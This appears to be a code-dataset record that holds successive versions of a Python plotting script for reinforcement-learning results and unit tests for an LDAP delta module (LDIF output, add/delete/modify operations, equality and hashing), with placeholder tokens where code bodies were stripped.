cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]\n draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')\n draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')\n\n\ndef draw_plot4():\n sarsagrid_map = {}\n sarsacp_map = {}\n qgrid_map = {}\n qcp_map = {}\n sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv'\n )[0]\n sarsagrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_grid_f_1.csv')[0]\n sarsacp_map['epsilon greedy'] = read_cp_csvdata(100,\n 'sarsa_cartpole_f_1.csv')[0]\n sarsacp_map['softmax'] = read_cp_csvdata(100,\n 'softmax/sarsa_cartpole_f_1.csv')[0]\n qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv'\n )[0]\n qgrid_map['softmax'] = read_cp_csvdata(100,\n 'softmax/qlearning_grid_f_1.csv')[0]\n qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv'\n )[0]\n qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]\n draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')\n draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')\n draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')\n draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')\n\n\ndef draw_plot5():\n pass\n",
"step-5": "import numpy as np\nimport matplotlib.pyplot as plt\nimport csv\n\n\ndef save_cp_csvdata(reward, err, filename):\n with open(filename, mode='w') as data_file:\n data_writer = csv.writer(data_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\n data_writer.writerow(['epoch', 'reward', 'error'])\n for i in range(reward.shape[0]):\n data_writer.writerow([i, reward[i], err[i]])\n\n\ndef read_cp_csvdata(epoch, filename):\n reward = np.zeros(epoch)\n err = np.zeros(epoch)\n with open(filename) as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n line_count = 0\n for row in csv_reader:\n if line_count == 0:\n pass\n else:\n # print(f'\\t{row[0]} works in the {row[1]} department, and was born in {row[2]}.')\n reward[line_count-1] = row[1]\n err[line_count-1] = row[2]\n line_count += 1\n print(f'Processed {line_count} lines.')\n return reward, err\n\n\ndef draw_plot(data, error, epoch=100, filename='tests.png'):\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n ax.errorbar(np.array(range(epoch)), data, yerr=error, fmt='o')\n plt.savefig(filename, dpi=200)\n\n plt.show()\n\n\ndef draw_multi_bar(x, y_map, filename='result.png'):\n labels = list(y_map.keys())\n\n plt.xlabel('episode')\n plt.ylabel('reward')\n\n plt.xticks([x.index(0), x.index(49), x.index(99)], [0, 49, 99])\n\n for l in labels:\n plt.plot(range(len(x)), y_map[l], linestyle='-', label=l)\n\n plt.legend(loc='lower right')\n\n plt.savefig(filename, dpi=200)\n plt.show()\n\n\ndef draw_multi_err(x, y_map, filename):\n labels = list(y_map.keys())\n\n fig, ax = plt.subplots()\n plt.xlabel('episode')\n plt.ylabel('reward')\n for l in labels:\n ax.errorbar(np.array(range(x)), y_map[l][0], yerr=y_map[l][1], fmt='o')\n plt.legend(loc='lower right')\n plt.savefig(filename, dpi=200)\n\n plt.show()\n\n\ndef draw_plot1():\n reward, err = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')\n draw_plot(reward, err, filename='sarsa_grid.png')\n\n reward, err = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')\n draw_plot(reward, err, filename='sarsa_cartpole.png')\n\n reward, err = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')\n draw_plot(reward, err, filename='qlearning_grid.png')\n\n reward, err = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')\n draw_plot(reward, err, filename='qlearning_cartpole.png')\n\n\ndef draw_plot3():\n grid_map = {}\n cp_map = {}\n\n grid_map['sarsa'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n cp_map['sarsa'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n grid_map['qlearning'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n cp_map['qlearning'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n grid_map['cem'] = read_cp_csvdata(100, 'ce_grid.csv')[0]\n cp_map['cem'] = read_cp_csvdata(100, 'ce_cartpole.csv')[0]\n draw_multi_bar(range(100), grid_map, filename='grid_comparision.png')\n draw_multi_bar(range(100), cp_map, filename='cartpole_comparision.png')\n\n\ndef draw_plot4():\n sarsagrid_map = {}\n sarsacp_map = {}\n qgrid_map = {}\n qcp_map = {}\n\n sarsagrid_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_grid_f_1.csv')[0]\n sarsagrid_map['softmax'] = read_cp_csvdata(100, 'softmax/sarsa_grid_f_1.csv')[0]\n\n sarsacp_map['epsilon greedy'] = read_cp_csvdata(100, 'sarsa_cartpole_f_1.csv')[0]\n sarsacp_map['softmax'] = read_cp_csvdata(100, 'softmax/sarsa_cartpole_f_1.csv')[0]\n\n qgrid_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_grid_f_1.csv')[0]\n qgrid_map['softmax'] = read_cp_csvdata(100, 'softmax/qlearning_grid_f_1.csv')[0]\n\n qcp_map['epsilon greedy'] = read_cp_csvdata(100, 'qlearning_cartpole_f.csv')[0]\n qcp_map['softmax'] = read_cp_csvdata(100, 'softmax/q_cartpole_f.csv')[0]\n\n draw_multi_bar(range(100), sarsagrid_map, filename='sarsa_grid_se.png')\n draw_multi_bar(range(100), sarsacp_map, filename='sarsa_cp_se.png')\n draw_multi_bar(range(100), qgrid_map, filename='q_grid_se.png')\n draw_multi_bar(range(100), qcp_map, filename='q_cp_se.png')\n\n\ndef draw_plot5():\n pass\n\n# draw_plot1()\n",
"step-ids": [
6,
8,
9,
10,
11
]
}
|
[
6,
8,
9,
10,
11
] |
<|reserved_special_token_0|>
class TestModificationOpLDIF(unittest.TestCase):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testReplaceAll(self):
m = delta.Replace('thud')
self.assertEqual(m.asLDIF(), b'replace: thud\n-\n')
<|reserved_special_token_0|>
class OperationTestCase(unittest.TestCase):
"""
Test case for operations on a LDAP tree.
"""
def getRoot(self):
"""
Returns a new LDAP root for dc=example,dc=com.
"""
return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.
DistinguishedName('dc=example,dc=com'))
class TestAddOpLDIF(OperationTestCase):
"""
Unit tests for `AddOp`.
"""
def testAsLDIF(self):
"""
It will return the LDIF representation of the operation.
"""
sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',
attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))
result = sut.asLDIF()
self.assertEqual(
b'dn: dc=example,dc=com\nchangetype: add\nfoo: bar\nfoo: baz\nquux: thud\n\n'
, result)
def testAddOpEqualitySameEntry(self):
"""
Objects are equal when the have the same LDAP entry.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(first, second)
def testAddOpInequalityDifferentEntry(self):
"""
Objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',
'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',
'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(first, second)
def testAddOpInequalityNoEntryObject(self):
"""
Objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
sut = delta.AddOp(team_entry)
self.assertNotEqual(sut, {'foo': ['same', 'attributes']})
def testAddOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(hash(first), hash(second))
def testAddOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'one', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'other', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testAddOp_DNExists(self):
"""
It fails to perform the `add` operation for an existing entry.
"""
root = self.getRoot()
root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [
'a', 'b'], 'ou': ['HR']})
hr_entry = entry.BaseLDAPEntry(dn=
'ou=Existing Team, dc=example,dc=com', attributes={'foo': [
'dont', 'care']})
sut = delta.AddOp(hr_entry)
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',
attributes={'bar': ['foo'], 'foo': ['bar']}))
self.assertEqual(repr(sut),
"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))"
)
class TestDeleteOpLDIF(OperationTestCase):
"""
Unit tests for DeleteOp.
"""
def testAsLDIF(self):
"""
It return the LDIF representation of the delete operation.
"""
sut = delta.DeleteOp('dc=example,dc=com')
result = sut.asLDIF()
self.assertEqual(b'dn: dc=example,dc=com\nchangetype: delete\n\n',
result)
def testDeleteOpEqualitySameDN(self):
"""
Objects are equal when the have the same DN.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(first, second)
def testDeleteOpEqualityEqualDN(self):
"""
DeleteOp objects are equal if their DNs are equal.
"""
first_dn = distinguishedname.DistinguishedName(stringValue=
'ou=Team,dc=example,dc=com')
first = delta.DeleteOp(first_dn)
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')
second = delta.DeleteOp(second_entry)
third = delta.DeleteOp('ou=Team, dc=example,dc=com')
self.assertEqual(first, second)
self.assertEqual(first, third)
def testDeleteOpInequalityDifferentEntry(self):
"""
DeleteOp objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(first, second)
def testDeleteOpInequalityNoEntryObject(self):
"""
DeleteOp objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
sut = delta.DeleteOp(team_entry)
self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')
def testDeleteOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(hash(first), hash(second))
def testDeleteOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testDeleteOp_DNNotFound(self):
"""
If fail to delete when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.DeleteOp('cn=nope,dc=example,dc=com')
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testDeleteOpInvalidDN(self):
"""
Invalid type of DN raises AssertionError
"""
self.assertRaises(AssertionError, delta.DeleteOp, 0)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.DeleteOp('dc=example,dc=com')
self.assertEqual(repr(sut), "DeleteOp('dc=example,dc=com')")
class TestModifyOp(OperationTestCase):
"""
Unit tests for ModifyOp.
"""
def testAsLDIF(self):
"""
It will return a LDIF representation of the contained operations.
"""
sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',
[delta.Add('postaladdress', [
'123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(
'description'), delta.Replace('telephonenumber', [
'+1 408 555 1234', '+1 408 555 5678']), delta.Delete(
'facsimiletelephonenumber', ['+1 408 555 9876'])])
result = sut.asLDIF()
self.assertEqual(
b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\nchangetype: modify\nadd: postaladdress\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\n-\ndelete: description\n-\nreplace: telephonenumber\ntelephonenumber: +1 408 555 1234\ntelephonenumber: +1 408 555 5678\n-\ndelete: facsimiletelephonenumber\nfacsimiletelephonenumber: +1 408 555 9876\n-\n\n'
, result)
def testInequalityDiffertnDN(self):
"""
Modify operations for different DN are not equal.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual(first, second)
def testInequalityDifferentModifications(self):
"""
Modify operations with different modifications are not equal
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual(first, second)
def testInequalityNotModifyOP(self):
"""
Modify operations are not equal with other object types.
"""
sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual('cn=john,dc=example,dc=com', sut)
def testInequalityDiffertnOperations(self):
"""
Modify operations for same DN but different operations are not equal.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(
'homeDirectory')])
self.assertNotEqual(first, second)
def testHashEquality(self):
"""
Modify operations can be hashed and equal objects have the same
hash.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertEqual(first, second)
self.assertEqual(first.asLDIF(), second.asLDIF(),
'LDIF equality is a precondition for valid hash values')
self.assertEqual(hash(first), hash(second))
def testHashInequality(self):
"""
Different modify operations have different hash values.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'homeDirectory')])
self.assertNotEqual(first.asLDIF(), second.asLDIF())
self.assertNotEqual(hash(first), hash(second))
def testModifyOp_DNNotFound(self):
"""
If fail to modify when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',
['bar'])])
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertEqual(repr(sut),
"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])"
)
class TestModificationComparison(unittest.TestCase):
def testEquality_Add_True(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = delta.Add('k', ['b', 'c', 'd'])
self.assertEqual(a, b)
def testEquality_AddVsDelete_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = delta.Delete('k', ['b', 'c', 'd'])
self.assertNotEqual(a, b)
def testEquality_AttributeSet_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])
self.assertNotEqual(a, b)
def testEquality_List_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = ['b', 'c', 'd']
self.assertNotEqual(a, b)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestModificationOpLDIF(unittest.TestCase):
<|reserved_special_token_0|>
def testDelete(self):
m = delta.Delete('foo', ['bar', 'baz'])
self.assertEqual(m.asLDIF(), b'delete: foo\nfoo: bar\nfoo: baz\n-\n')
<|reserved_special_token_0|>
def testReplace(self):
m = delta.Replace('foo', ['bar', 'baz'])
self.assertEqual(m.asLDIF(), b'replace: foo\nfoo: bar\nfoo: baz\n-\n')
def testReplaceAll(self):
m = delta.Replace('thud')
self.assertEqual(m.asLDIF(), b'replace: thud\n-\n')
def testAddBase64(self):
"""
LDIF attribute representation is base64 encoded
if attribute value contains nonprintable characters
or starts with reserved characters
"""
m = delta.Add('attr', [':value1', 'value\n\r2'])
self.assertEqual(m.asLDIF(),
b'add: attr\nattr:: OnZhbHVlMQ==\nattr:: dmFsdWUKDTI=\n-\n')
class OperationTestCase(unittest.TestCase):
"""
Test case for operations on a LDAP tree.
"""
def getRoot(self):
"""
Returns a new LDAP root for dc=example,dc=com.
"""
return inmemory.ReadOnlyInMemoryLDAPEntry(dn=distinguishedname.
DistinguishedName('dc=example,dc=com'))
class TestAddOpLDIF(OperationTestCase):
"""
Unit tests for `AddOp`.
"""
def testAsLDIF(self):
"""
It will return the LDIF representation of the operation.
"""
sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',
attributes={'foo': ['bar', 'baz'], 'quux': ['thud']}))
result = sut.asLDIF()
self.assertEqual(
b'dn: dc=example,dc=com\nchangetype: add\nfoo: bar\nfoo: baz\nquux: thud\n\n'
, result)
def testAddOpEqualitySameEntry(self):
"""
Objects are equal when the have the same LDAP entry.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(first, second)
def testAddOpInequalityDifferentEntry(self):
"""
Objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=First Team, dc=example,dc=com', attributes={'foo': ['same',
'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=First Team, dc=example,dc=com', attributes={'foo': ['other',
'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(first, second)
def testAddOpInequalityNoEntryObject(self):
"""
Objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
sut = delta.AddOp(team_entry)
self.assertNotEqual(sut, {'foo': ['same', 'attributes']})
def testAddOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'same', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertEqual(hash(first), hash(second))
def testAddOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'one', 'attributes']})
second_entry = entry.BaseLDAPEntry(dn=
'ou=Duplicate Team, dc=example,dc=com', attributes={'foo': [
'other', 'attributes']})
first = delta.AddOp(first_entry)
second = delta.AddOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testAddOp_DNExists(self):
"""
It fails to perform the `add` operation for an existing entry.
"""
root = self.getRoot()
root.addChild(rdn='ou=Existing Team', attributes={'objectClass': [
'a', 'b'], 'ou': ['HR']})
hr_entry = entry.BaseLDAPEntry(dn=
'ou=Existing Team, dc=example,dc=com', attributes={'foo': [
'dont', 'care']})
sut = delta.AddOp(hr_entry)
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPEntryAlreadyExists)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.AddOp(entry.BaseLDAPEntry(dn='dc=example,dc=com',
attributes={'bar': ['foo'], 'foo': ['bar']}))
self.assertEqual(repr(sut),
"AddOp(BaseLDAPEntry('dc=example,dc=com', {'bar': ['foo'], 'foo': ['bar']}))"
)
class TestDeleteOpLDIF(OperationTestCase):
"""
Unit tests for DeleteOp.
"""
def testAsLDIF(self):
"""
It return the LDIF representation of the delete operation.
"""
sut = delta.DeleteOp('dc=example,dc=com')
result = sut.asLDIF()
self.assertEqual(b'dn: dc=example,dc=com\nchangetype: delete\n\n',
result)
def testDeleteOpEqualitySameDN(self):
"""
Objects are equal when the have the same DN.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(first, second)
def testDeleteOpEqualityEqualDN(self):
"""
DeleteOp objects are equal if their DNs are equal.
"""
first_dn = distinguishedname.DistinguishedName(stringValue=
'ou=Team,dc=example,dc=com')
first = delta.DeleteOp(first_dn)
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example, dc=com')
second = delta.DeleteOp(second_entry)
third = delta.DeleteOp('ou=Team, dc=example,dc=com')
self.assertEqual(first, second)
self.assertEqual(first, third)
def testDeleteOpInequalityDifferentEntry(self):
"""
DeleteOp objects are not equal when the have different LDAP entries.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(first, second)
def testDeleteOpInequalityNoEntryObject(self):
"""
DeleteOp objects is not equal with random objects.
"""
team_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
sut = delta.DeleteOp(team_entry)
self.assertNotEqual(sut, 'ou=Team, dc=example,dc=com')
def testDeleteOpHashSimilar(self):
"""
Objects which are equal have the same hash.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertEqual(hash(first), hash(second))
def testDeleteOpHashDifferent(self):
"""
Objects which are not equal have different hash.
"""
first_entry = entry.BaseLDAPEntry(dn='ou=Team, dc=example,dc=com')
second_entry = entry.BaseLDAPEntry(dn='ou=Cowboys, dc=example,dc=com')
first = delta.DeleteOp(first_entry)
second = delta.DeleteOp(second_entry)
self.assertNotEqual(hash(first), hash(second))
def testDeleteOp_DNNotFound(self):
"""
If fail to delete when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.DeleteOp('cn=nope,dc=example,dc=com')
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testDeleteOpInvalidDN(self):
"""
Invalid type of DN raises AssertionError
"""
self.assertRaises(AssertionError, delta.DeleteOp, 0)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.DeleteOp('dc=example,dc=com')
self.assertEqual(repr(sut), "DeleteOp('dc=example,dc=com')")
class TestModifyOp(OperationTestCase):
"""
Unit tests for ModifyOp.
"""
def testAsLDIF(self):
"""
It will return a LDIF representation of the contained operations.
"""
sut = delta.ModifyOp('cn=Paula Jensen, ou=Dev Ops, dc=airius, dc=com',
[delta.Add('postaladdress', [
'123 Anystreet $ Sunnyvale, CA $ 94086']), delta.Delete(
'description'), delta.Replace('telephonenumber', [
'+1 408 555 1234', '+1 408 555 5678']), delta.Delete(
'facsimiletelephonenumber', ['+1 408 555 9876'])])
result = sut.asLDIF()
self.assertEqual(
b'dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\nchangetype: modify\nadd: postaladdress\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\n-\ndelete: description\n-\nreplace: telephonenumber\ntelephonenumber: +1 408 555 1234\ntelephonenumber: +1 408 555 5678\n-\ndelete: facsimiletelephonenumber\nfacsimiletelephonenumber: +1 408 555 9876\n-\n\n'
, result)
def testInequalityDiffertnDN(self):
"""
Modify operations for different DN are not equal.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual(first, second)
def testInequalityDifferentModifications(self):
"""
Modify operations with different modifications are not equal
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Add(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual(first, second)
def testInequalityNotModifyOP(self):
"""
Modify operations are not equal with other object types.
"""
sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertNotEqual('cn=john,dc=example,dc=com', sut)
def testInequalityDiffertnOperations(self):
"""
Modify operations for same DN but different operations are not equal.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=doe,dc=example,dc=com', [delta.Delete(
'homeDirectory')])
self.assertNotEqual(first, second)
def testHashEquality(self):
"""
Modify operations can be hashed and equal objects have the same
hash.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertEqual(first, second)
self.assertEqual(first.asLDIF(), second.asLDIF(),
'LDIF equality is a precondition for valid hash values')
self.assertEqual(hash(first), hash(second))
def testHashInequality(self):
"""
Different modify operations have different hash values.
"""
first = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
second = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'homeDirectory')])
self.assertNotEqual(first.asLDIF(), second.asLDIF())
self.assertNotEqual(hash(first), hash(second))
def testModifyOp_DNNotFound(self):
"""
If fail to modify when the RDN does not exists.
"""
root = self.getRoot()
sut = delta.ModifyOp('cn=nope,dc=example,dc=com', [delta.Add('foo',
['bar'])])
deferred = sut.patch(root)
failure = self.failureResultOf(deferred)
self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)
def testRepr(self):
"""
Getting string representation
"""
sut = delta.ModifyOp('cn=john,dc=example,dc=com', [delta.Delete(
'description')])
self.assertEqual(repr(sut),
"ModifyOp(dn='cn=john,dc=example,dc=com', modifications=[Delete('description', [])])"
)
class TestModificationComparison(unittest.TestCase):
def testEquality_Add_True(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = delta.Add('k', ['b', 'c', 'd'])
self.assertEqual(a, b)
def testEquality_AddVsDelete_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = delta.Delete('k', ['b', 'c', 'd'])
self.assertNotEqual(a, b)
def testEquality_AttributeSet_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = attributeset.LDAPAttributeSet('k', ['b', 'c', 'd'])
self.assertNotEqual(a, b)
def testEquality_List_False(self):
a = delta.Add('k', ['b', 'c', 'd'])
b = ['b', 'c', 'd']
self.assertNotEqual(a, b)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class TestModifications(unittest.TestCase):
def setUp(self):
self.foo = ldapsyntax.LDAPEntry(None, dn='cn=foo,dc=example,dc=com',
attributes={'objectClass': ['person'], 'cn': ['foo', 'thud'],
'sn': ['bar'], 'more': ['junk']})
<|reserved_special_token_0|>
def testAddNew(self):
mod = delta.Add('stuff', ['val1', 'val2'])
mod.patch(self.foo)
self.assertEqual(self.foo['stuff'], ['val1', 'val2'])
self.assertEqual(self.foo['cn'], ['foo', 'thud'])
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
def testReplace_Delete_NonExisting(self):
mod = delta.Replace('nonExisting', [])
mod.patch(self.foo)
self.assertFalse('stuff' in self.foo)
self.assertEqual(self.foo['sn'], ['bar'])
self.assertEqual(self.foo['more'], ['junk'])
class TestModificationOpLDIF(unittest.TestCase):
def testAdd(self):
m = delta.Add('foo', ['bar', 'baz'])
self.assertEqual(m.asLDIF(), b'add: foo\nfoo: bar\nfoo: baz\n-\n')
def testDelete(self):
m = delta.Delete('foo', ['bar', 'baz'])
self.assertEqual(m.asLDIF(), b'delete: foo\nfoo: bar\nfoo: baz\n-\n')
def testDeleteAll(self):
m = delta.Delete('foo')
self.assertEqual(m.asLDIF(), b'delete: foo\n-\n')
def testReplace(self):
